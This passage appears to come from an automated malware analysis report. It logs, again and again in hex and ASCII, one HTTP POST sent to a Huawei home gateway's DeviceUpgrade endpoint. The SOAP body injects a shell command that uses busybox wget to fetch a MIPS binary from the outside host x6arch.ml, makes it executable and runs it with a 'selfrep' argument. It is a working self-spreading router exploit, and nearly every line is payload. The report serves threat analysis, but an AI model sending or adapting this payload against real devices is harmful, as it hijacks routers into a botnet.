33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 